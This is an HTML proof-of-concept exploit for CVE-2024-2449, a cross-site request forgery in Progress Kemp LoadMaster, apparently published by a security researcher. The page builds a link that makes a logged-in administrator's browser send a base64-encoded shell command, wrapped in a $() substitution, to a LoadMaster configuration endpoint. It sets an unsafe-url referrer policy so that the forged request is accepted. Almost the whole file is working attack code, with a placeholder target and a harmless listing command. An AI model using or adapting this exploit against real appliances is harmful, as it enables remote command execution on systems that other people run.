<!--
Exploit for CVE-2024-2449: Cross-Site Request Forgery in Progress Kemp LoadMaster
Tested on: LoadMaster 7.2.59.2
Author: Dave Yesland @daveysec with Rhino Security Labs

--> 
<html>
    <head>
    <meta name="referrer" content="unsafe-url" />
    </head>
      <body>
    
        <div id="adiv">
        </div>
        
            <script>
            var target = 'https://TARGET_HOST';
            var command = 'ls / 1>&2';
            var enc_command = btoa('$('+command+')');
            var url = target+"/progs/hg_cfg/add_rs/"+enc_command;
            
            // Create a link and add it to 'adiv'
            var link = document.createElement('a');
            link.href = url;
            link.textContent = 'Execute command: '+command;
            document.getElementById('adiv').appendChild(link);
        </script>
      </body>
    </html>
    